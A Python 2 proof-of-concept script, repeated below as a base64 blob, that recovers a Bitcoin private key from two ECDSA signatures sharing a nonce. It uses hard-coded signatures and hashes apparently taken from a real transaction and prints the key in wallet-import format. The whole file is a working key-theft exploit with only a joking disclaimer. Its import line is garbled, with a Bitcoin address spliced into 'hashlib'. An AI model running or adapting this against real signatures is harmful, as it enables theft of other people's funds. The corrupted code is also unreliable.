#!/usr/bin/env python
#
# Proof of concept of bitcoin private key recovery using weak ECDSA signatures
# 
# Based on http://w...content-available-to-author-only...r.net/2013/01/28/recovering-bitcoin-private-keys.html
# Regarding Bitcoin Tx https://b...content-available-to-author-only...n.info/tx/14JHoRAdmJg3XR4RjMDh6Wed6ft6hzbQe9.
# As it's said in the previous article you need to poke around into the OP_CHECKSIG function in order to get z1 and z2,
# in other hand for every other parameters you should be able to get them from the Tx itself.
#
# Author Dario Clavijo <daedalus2027@gmail.com> , Jan 2013
# Donations: 1FMobgL3Z9uR3hM93LcrVxvDEyrfbquTSy
#
# This code is licensed under the terms of the GPLv3 license http://g...content-available-to-author-only...f.org/
#
# Disclaimer: Do not steal other peoples money, that's bad.
 
 
import hash14JHoRAdmJg3XR4RjMDh6Wed6ft6hzbQe9lib
 
p  = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEBAAEDCE6AF48A03BBFD25E8CD0364141
#r  = 0xd47ce4c025c35ec440bc81d99834a624875161a26bf56ef7fdc0f5d52f843ad1
#s1 = 0x44e1ff2dfd8102cf7a47c21d5c9fd5701610d04953c6836596b4fe9dd2f53e3e
#s2 = 0x9a5f1c75e461d7ceb1cf3cab9013eb2dc85b6d0da8c3c6e27e3a5a5b3faa5bab
z1 = 0xc0e2d0a89a348de88fda08211c70d1d7e52ccef2eb9459911bf977d587784c6e 
z2 = 0x17b0f41c8c337ac1e18c98759e83a8cccbc368dd9d89e5f03cb633c265fd0ddc
 
# r1 and s1 are contained in this ECDSA signature encoded in DER (openssl default).
der_sig1 = "30440220d47ce4c025c35ec440bc81d99834a624875161a26bf56ef7fdc0f5d52f843ad1022044e1ff2dfd8102cf7a47c21d5c9fd5701610d04953c6836596b4fe9dd2f53e3e01"
 
# the same thing with the above line.
der_sig2 = "30440220d47ce4c025c35ec440bc81d99834a624875161a26bf56ef7fdc0f5d52f843ad102209a5f1c75e461d7ceb1cf3cab9013eb2dc85b6d0da8c3c6e27e3a5a5b3faa5bab01"
 
params = {'p':p,'sig1':der_sig1,'sig2':der_sig2,'z1':z1,'z2':z2}
 
def hexify (s, flip=False):
    if flip:
        return s[::-1].encode ('hex')
    else:
        return s.encode ('hex')
 
def unhexify (s, flip=False):
    if flip:
        return s.decode ('hex')[::-1]
    else:
        return s.decode ('hex')
 
def inttohexstr(i):
	tmpstr = "%s" % hex(i)
	hexstr = tmpstr.replace('0x','').replace('L','')
	return hexstr
 
b58_digits = '123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz'
 
def dhash(s):
    return hashlib.sha256(hashlib.sha256(s).digest()).digest()
 
def rhash(s):
    h1 = hashlib.new('ripemd160')
    h1.update(hashlib.sha256(s).digest())
    return h1.digest()
 
def base58_encode(n):
    l = []
    while n > 0:
        n, r = divmod(n, 58)
        l.insert(0,(b58_digits[r]))
    return ''.join(l)
 
def base58_encode_padded(s):
    res = base58_encode(int('0x' + s.encode('hex'), 16))
    pad = 0
    for c in s:
        if c == chr(0):
            pad += 1
        else:
            break
    return b58_digits[0] * pad + res
 
def base58_check_encode(s, version=0):
    vs = chr(version) + s
    check = dhash(vs)[:4]
    return base58_encode_padded(vs + check)
 
def get_der_field(i,binary):
        if (ord(binary[i]) == 02):
                length = binary[i+1]
                end = i + ord(length) + 2
                string = binary[i+2:end]
                return string
        else:
                return None
 
# Here we decode a DER encoded string separating r and s
def der_decode(hexstring):
        binary = unhexify(hexstring)
        full_length = ord(binary[1])
        if ((full_length + 3) == len(binary)):
                r = get_der_field(2,binary)
                s = get_der_field(len(r)+4,binary)
                return r,s
        else:
                return None
 
def show_results(privkey):
        hexprivkey = inttohexstr(privkey)	
	print "intPrivkey = %d"  % privkey
	print "hexPrivkey = %s" % hexprivkey
	print "bitcoin Privkey (WIF) = %s" % base58_check_encode(hexprivkey.decode('hex'),version=128)
 
def show_params(params):
	for param in params:
		try:
			print "%s: %s" % (param,inttohexstr(params[param]))
		except:
			print "%s: %s" % (param,params[param])
 
# This is the same as (a/b mod p) but avoiding floating numbers since we are dealing with prime numbers and modulus
# and beacuse this the python built in division isn't suitable for our needs, 
# it returns floating point numbers rounded and we don't want them.
def inverse_mult(a,b,p):
	y =  (a * pow(b,p-2,p))  #(pow(a, b) modulo p) where p should be a prime number
	return y
 
# Here is the wrock!
def derivate_privkey(p,r,s1,s2,z1,z2):
	privkey = (inverse_mult(((z1*s2) - (z2*s1)),(r*(s1-s2)),p) % int(p))
	return privkey
 
def process_signatures(params):
 
	p = params['p']
	sig1 = params['sig1']
	sig2 = params['sig2']
	z1 = params['z1']
	z2 = params['z2']
 
	tmp_r1,tmp_s1 = der_decode(sig1) # Here we extract r and s from the signature encoded in DER.
	tmp_r2,tmp_s2 = der_decode(sig2) # Idem.
 
	if (tmp_r1 == tmp_r2): # If r1 and r2 are equal the two signatures are weak and we can recover the private key.
 
 		if (tmp_s1 != tmp_s2): # This: (s1-s2)>0 should be complied in order be able to compute the private key.
 
			# the key of ECDSA are the integer numbers thats why we convert hexa from to them.
			r1 = int(tmp_r1.encode('hex'),16)
			r2 = int(tmp_r2.encode('hex'),16)
			s1 = int(tmp_s1.encode('hex'),16)
			s2 = int(tmp_s2.encode('hex'),16)
 
			privkey = derivate_privkey(p,r1,s1,s2,z1,z2)
			return privkey		
 
		else:
			raise Exception("Privkey not computable: s1 and s2 are equal.")
	else:
		raise Exception("Privkey not computable: r1 and r2 are not equal.")
 
def main():
	show_params(params)
	privkey = process_signatures(params)
	if privkey:		
		show_results(privkey)
 
if __name__ == "__main__":
    main()

IyEvdXNyL2Jpbi9lbnYgcHl0aG9uCiMKIyBQcm9vZiBvZiBjb25jZXB0IG9mIGJpdGNvaW4gcHJpdmF0ZSBrZXkgcmVjb3ZlcnkgdXNpbmcgd2VhayBFQ0RTQSBzaWduYXR1cmVzCiMgCiMgQmFzZWQgb24gaHR0cDovL3cuLi5jb250ZW50LWF2YWlsYWJsZS10by1hdXRob3Itb25seS4uLnIubmV0LzIwMTMvMDEvMjgvcmVjb3ZlcmluZy1iaXRjb2luLXByaXZhdGUta2V5cy5odG1sCiMgUmVnYXJkaW5nIEJpdGNvaW4gVHggaHR0cHM6Ly9iLi4uY29udGVudC1hdmFpbGFibGUtdG8tYXV0aG9yLW9ubHkuLi5uLmluZm8vdHgvMTRKSG9SQWRtSmczWFI0UmpNRGg2V2VkNmZ0Nmh6YlFlOS4KIyBBcyBpdCdzIHNhaWQgaW4gdGhlIHByZXZpb3VzIGFydGljbGUgeW91IG5lZWQgdG8gcG9rZSBhcm91bmQgaW50byB0aGUgT1BfQ0hFQ0tTSUcgZnVuY3Rpb24gaW4gb3JkZXIgdG8gZ2V0IHoxIGFuZCB6MiwKIyBpbiBvdGhlciBoYW5kIGZvciBldmVyeSBvdGhlciBwYXJhbWV0ZXJzIHlvdSBzaG91bGQgYmUgYWJsZSB0byBnZXQgdGhlbSBmcm9tIHRoZSBUeCBpdHNlbGYuCiMKIyBBdXRob3IgRGFyaW8gQ2xhdmlqbyA8ZGFlZGFsdXMyMDI3QGdtYWlsLmNvbT4gLCBKYW4gMjAxMwojIERvbmF0aW9uczogMUZNb2JnTDNaOXVSM2hNOTNMY3JWeHZERXlyZmJxdVRTeQojCiMgVGhpcyBjb2RlIGlzIGxpY2Vuc2VkIHVuZGVyIHRoZSB0ZXJtcyBvZiB0aGUgR1BMdjMgbGljZW5zZSBodHRwOi8vZy4uLmNvbnRlbnQtYXZhaWxhYmxlLXRvLWF1dGhvci1vbmx5Li4uZi5vcmcvCiMKIyBEaXNjbGFpbWVyOiBEbyBub3Qgc3RlYWwgb3RoZXIgcGVvcGxlcyBtb25leSwgdGhhdCdzIGJhZC4KCgppbXBvcnQgaGFzaDE0SkhvUkFkbUpnM1hSNFJqTURoNldlZDZmdDZoemJRZTlsaWIKCnAgID0gMHhGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRkZGRUJBQUVEQ0U2QUY0OEEwM0JCRkQyNUU4Q0QwMzY0MTQxCiNyICA9IDB4ZDQ3Y2U0YzAyNWMzNWVjNDQwYmM4MWQ5OTgzNGE2MjQ4NzUxNjFhMjZiZjU2ZWY3ZmRjMGY1ZDUyZjg0M2FkMQojczEgPSAweDQ0ZTFmZjJkZmQ4MTAyY2Y3YTQ3YzIxZDVjOWZkNTcwMTYxMGQwNDk1M2M2ODM2NTk2YjRmZTlkZDJmNTNlM2UKI3MyID0gMHg5YTVmMWM3NWU0NjFkN2NlYjFjZjNjYWI5MDEzZWIyZGM4NWI2ZDBkYThjM2M2ZTI3ZTNhNWE1YjNmYWE1YmFiCnoxID0gMHhjMGUyZDBhODlhMzQ4ZGU4OGZkYTA4MjExYzcwZDFkN2U1MmNjZWYyZWI5NDU5OTExYmY5NzdkNTg3Nzg0YzZlIAp6MiA9IDB4MTdiMGY0MWM4YzMzN2FjMWUxOGM5ODc1OWU4M2E4Y2NjYmMzNjhkZDlkODllNWYwM2NiNjMzYzI2NWZkMGRkYwoKIyByMSBhbmQgczEgYXJlIGNvbnRhaW5lZCBpbiB0aGlzIEVDRFNBIHNpZ25hdHVyZSBlbmNvZGVkIGluIERFUiAob3BlbnNzbCBkZWZhdWx0KS4KZGVyX3NpZzEgPSAiMzA0NDAyMjBkNDdjZTRjMDI1YzM1ZWM0NDBiYzgxZDk5ODM0YTYyNDg3NTE2MWEyNmJmNTZlZjdmZGMwZjVkNTJmODQzYWQxMDIyMDQ0ZTFmZjJkZmQ4MTAyY2Y3YTQ3YzIxZDVjOWZkNTcwMTYxMGQwNDk1M2M2ODM2NTk2YjRmZTlkZDJmNTNlM2UwMSIKCiMgdGhlIHNhbWUgdGhpbmcgd2l0aCB0aGUgYWJvdmUgbGluZS4KZGVyX3NpZzIgPSAiMzA0NDAyMjBkNDdjZTRjMDI1YzM1ZWM0NDBiYzgxZDk5ODM0YTYyNDg3NTE2MWEyNmJmNTZlZjdmZGMwZjVkNTJmODQzYWQxMDIyMDlhNWYxYzc1ZTQ2MWQ3Y2ViMWNmM2NhYjkwMTNlYjJkYzg1YjZkMGRhOGMzYzZlMjdlM2E1YTViM2ZhYTViYWIwMSIKCnBhcmFtcyA9IHsncCc6cCwnc2lnMSc6ZGVyX3NpZzEsJ3NpZzInOmRlcl9zaWcyLCd6MSc6ejEsJ3oyJzp6Mn0KCmRlZiBoZXhpZnkgKHMsIGZsaXA9RmFsc2UpOgogICAgaWYgZmxpcDoKICAgICAgICByZXR1cm4gc1s6Oi0xXS5lbmNvZGUgKCdoZXgnKQogICAgZWxzZToKICAgICAgICByZXR1cm4gcy5lbmNvZGUgKCdoZXgnKQoKZGVmIHVuaGV4aWZ5IChzLCBmbGlwPUZhbHNlKToKICAgIGlmIGZsaXA6CiAgICAgICAgcmV0dXJuIHMuZGVjb2RlICgnaGV4JylbOjotMV0KICAgIGVsc2U6CiAgICAgICAgcmV0dXJuIHMuZGVjb2RlICgnaGV4JykKCmRlZiBpbnR0b2hleHN0cihpKToKCXRtcHN0ciA9ICIlcyIgJSBoZXgoaSkKCWhleHN0ciA9IHRtcHN0ci5yZXBsYWNlKCcweCcsJycpLnJlcGxhY2UoJ0wnLCcnKQoJcmV0dXJuIGhleHN0cgoKYjU4X2RpZ2l0cyA9ICcxMjM0NTY3ODlBQkNERUZHSEpLTE1OUFFSU1RVVldYWVphYmNkZWZnaGlqa21ub3BxcnN0dXZ3eHl6JwoKZGVmIGRoYXNoKHMpOgogICAgcmV0dXJuIGhhc2hsaWIuc2hhMjU2KGhhc2hsaWIuc2hhMjU2KHMpLmRpZ2VzdCgpKS5kaWdlc3QoKQoKZGVmIHJoYXNoKHMpOgogICAgaDEgPSBoYXNobGliLm5ldygncmlwZW1kMTYwJykKICAgIGgxLnVwZGF0ZShoYXNobGliLnNoYTI1NihzKS5kaWdlc3QoKSkKICAgIHJldHVybiBoMS5kaWdlc3QoKQoKZGVmIGJhc2U1OF9lbmNvZGUobik6CiAgICBsID0gW10KICAgIHdoaWxlIG4gPiAwOgogICAgICAgIG4sIHIgPSBkaXZtb2QobiwgNTgpCiAgICAgICAgbC5pbnNlcnQoMCwoYjU4X2RpZ2l0c1tyXSkpCiAgICByZXR1cm4gJycuam9pbihsKQoKZGVmIGJhc2U1OF9lbmNvZGVfcGFkZGVkKHMpOgogICAgcmVzID0gYmFzZTU4X2VuY29kZShpbnQoJzB4JyArIHMuZW5jb2RlKCdoZXgnKSwgMTYpKQogICAgcGFkID0gMAogICAgZm9yIGMgaW4gczoKICAgICAgICBpZiBjID09IGNocigwKToKICAgICAgICAgICAgcGFkICs9IDEKICAgICAgICBlbHNlOgogICAgICAgICAgICBicmVhawogICAgcmV0dXJuIGI1OF9kaWdpdHNbMF0gKiBwYWQgKyByZXMKCmRlZiBiYXNlNThfY2hlY2tfZW5jb2RlKHMsIHZlcnNpb249MCk6CiAgICB2cyA9IGNocih2ZXJzaW9uKSArIHMKICAgIGNoZWNrID0gZGhhc2godnMpWzo0XQogICAgcmV0dXJuIGJhc2U1OF9lbmNvZGVfcGFkZGVkKHZzICsgY2hlY2spCgkKZGVmIGdldF9kZXJfZmllbGQoaSxiaW5hcnkpOgogICAgICAgIGlmIChvcmQoYmluYXJ5W2ldKSA9PSAwMik6CiAgICAgICAgICAgICAgICBsZW5ndGggPSBiaW5hcnlbaSsxXQogICAgICAgICAgICAgICAgZW5kID0gaSArIG9yZChsZW5ndGgpICsgMgogICAgICAgICAgICAgICAgc3RyaW5nID0gYmluYXJ5W2krMjplbmRdCiAgICAgICAgICAgICAgICByZXR1cm4gc3RyaW5nCiAgICAgICAgZWxzZToKICAgICAgICAgICAgICAgIHJldHVybiBOb25lCgojIEhlcmUgd2UgZGVjb2RlIGEgREVSIGVuY29kZWQgc3RyaW5nIHNlcGFyYXRpbmcgciBhbmQgcwpkZWYgZGVyX2RlY29kZShoZXhzdHJpbmcpOgogICAgICAgIGJpbmFyeSA9IHVuaGV4aWZ5KGhleHN0cmluZykKICAgICAgICBmdWxsX2xlbmd0aCA9IG9yZChiaW5hcnlbMV0pCiAgICAgICAgaWYgKChmdWxsX2xlbmd0aCArIDMpID09IGxlbihiaW5hcnkpKToKICAgICAgICAgICAgICAgIHIgPSBnZXRfZGVyX2ZpZWxkKDIsYmluYXJ5KQogICAgICAgICAgICAgICAgcyA9IGdldF9kZXJfZmllbGQobGVuKHIpKzQsYmluYXJ5KQogICAgICAgICAgICAgICAgcmV0dXJuIHIscwogICAgICAgIGVsc2U6CiAgICAgICAgICAgICAgICByZXR1cm4gTm9uZQoKZGVmIHNob3dfcmVzdWx0cyhwcml2a2V5KToKICAgICAgICBoZXhwcml2a2V5ID0gaW50dG9oZXhzdHIocHJpdmtleSkJCglwcmludCAiaW50UHJpdmtleSA9ICVkIiAgJSBwcml2a2V5CglwcmludCAiaGV4UHJpdmtleSA9ICVzIiAlIGhleHByaXZrZXkKCXByaW50ICJiaXRjb2luIFByaXZrZXkgKFdJRikgPSAlcyIgJSBiYXNlNThfY2hlY2tfZW5jb2RlKGhleHByaXZrZXkuZGVjb2RlKCdoZXgnKSx2ZXJzaW9uPTEyOCkKCmRlZiBzaG93X3BhcmFtcyhwYXJhbXMpOgoJZm9yIHBhcmFtIGluIHBhcmFtczoKCQl0cnk6CgkJCXByaW50ICIlczogJXMiICUgKHBhcmFtLGludHRvaGV4c3RyKHBhcmFtc1twYXJhbV0pKQoJCWV4Y2VwdDoKCQkJcHJpbnQgIiVzOiAlcyIgJSAocGFyYW0scGFyYW1zW3BhcmFtXSkKCiMgVGhpcyBpcyB0aGUgc2FtZSBhcyAoYS9iIG1vZCBwKSBidXQgYXZvaWRpbmcgZmxvYXRpbmcgbnVtYmVycyBzaW5jZSB3ZSBhcmUgZGVhbGluZyB3aXRoIHByaW1lIG51bWJlcnMgYW5kIG1vZHVsdXMKIyBhbmQgYmVhY3VzZSB0aGlzIHRoZSBweXRob24gYnVpbHQgaW4gZGl2aXNpb24gaXNuJ3Qgc3VpdGFibGUgZm9yIG91ciBuZWVkcywgCiMgaXQgcmV0dXJucyBmbG9hdGluZyBwb2ludCBudW1iZXJzIHJvdW5kZWQgYW5kIHdlIGRvbid0IHdhbnQgdGhlbS4KZGVmIGludmVyc2VfbXVsdChhLGIscCk6Cgl5ID0gIChhICogcG93KGIscC0yLHApKSAgIyhwb3coYSwgYikgbW9kdWxvIHApIHdoZXJlIHAgc2hvdWxkIGJlIGEgcHJpbWUgbnVtYmVyCglyZXR1cm4geQoKIyBIZXJlIGlzIHRoZSB3cm9jayEKZGVmIGRlcml2YXRlX3ByaXZrZXkocCxyLHMxLHMyLHoxLHoyKToKCXByaXZrZXkgPSAoaW52ZXJzZV9tdWx0KCgoejEqczIpIC0gKHoyKnMxKSksKHIqKHMxLXMyKSkscCkgJSBpbnQocCkpCglyZXR1cm4gcHJpdmtleQoKZGVmIHByb2Nlc3Nfc2lnbmF0dXJlcyhwYXJhbXMpOgoJCglwID0gcGFyYW1zWydwJ10KCXNpZzEgPSBwYXJhbXNbJ3NpZzEnXQoJc2lnMiA9IHBhcmFtc1snc2lnMiddCgl6MSA9IHBhcmFtc1snejEnXQoJejIgPSBwYXJhbXNbJ3oyJ10KCQoJdG1wX3IxLHRtcF9zMSA9IGRlcl9kZWNvZGUoc2lnMSkgIyBIZXJlIHdlIGV4dHJhY3QgciBhbmQgcyBmcm9tIHRoZSBzaWduYXR1cmUgZW5jb2RlZCBpbiBERVIuCgl0bXBfcjIsdG1wX3MyID0gZGVyX2RlY29kZShzaWcyKSAjIElkZW0uCgoJaWYgKHRtcF9yMSA9PSB0bXBfcjIpOiAjIElmIHIxIGFuZCByMiBhcmUgZXF1YWwgdGhlIHR3byBzaWduYXR1cmVzIGFyZSB3ZWFrIGFuZCB3ZSBjYW4gcmVjb3ZlciB0aGUgcHJpdmF0ZSBrZXkuCgogCQlpZiAodG1wX3MxICE9IHRtcF9zMik6ICMgVGhpczogKHMxLXMyKT4wIHNob3VsZCBiZSBjb21wbGllZCBpbiBvcmRlciBiZSBhYmxlIHRvIGNvbXB1dGUgdGhlIHByaXZhdGUga2V5LgoJCQoJCQkjIHRoZSBrZXkgb2YgRUNEU0EgYXJlIHRoZSBpbnRlZ2VyIG51bWJlcnMgdGhhdHMgd2h5IHdlIGNvbnZlcnQgaGV4YSBmcm9tIHRvIHRoZW0uCgkJCXIxID0gaW50KHRtcF9yMS5lbmNvZGUoJ2hleCcpLDE2KQoJCQlyMiA9IGludCh0bXBfcjIuZW5jb2RlKCdoZXgnKSwxNikKCQkJczEgPSBpbnQodG1wX3MxLmVuY29kZSgnaGV4JyksMTYpCgkJCXMyID0gaW50KHRtcF9zMi5lbmNvZGUoJ2hleCcpLDE2KQoJCgkJCXByaXZrZXkgPSBkZXJpdmF0ZV9wcml2a2V5KHAscjEsczEsczIsejEsejIpCgkJCXJldHVybiBwcml2a2V5CQkKCgkJZWxzZToKCQkJcmFpc2UgRXhjZXB0aW9uKCJQcml2a2V5IG5vdCBjb21wdXRhYmxlOiBzMSBhbmQgczIgYXJlIGVxdWFsLiIpCgllbHNlOgoJCXJhaXNlIEV4Y2VwdGlvbigiUHJpdmtleSBub3QgY29tcHV0YWJsZTogcjEgYW5kIHIyIGFyZSBub3QgZXF1YWwuIikKCmRlZiBtYWluKCk6CglzaG93X3BhcmFtcyhwYXJhbXMpCglwcml2a2V5ID0gcHJvY2Vzc19zaWduYXR1cmVzKHBhcmFtcykKCWlmIHByaXZrZXk6CQkKCQlzaG93X3Jlc3VsdHMocHJpdmtleSkKCmlmIF9fbmFtZV9fID09ICJfX21haW5fXyI6CiAgICBtYWluKCk=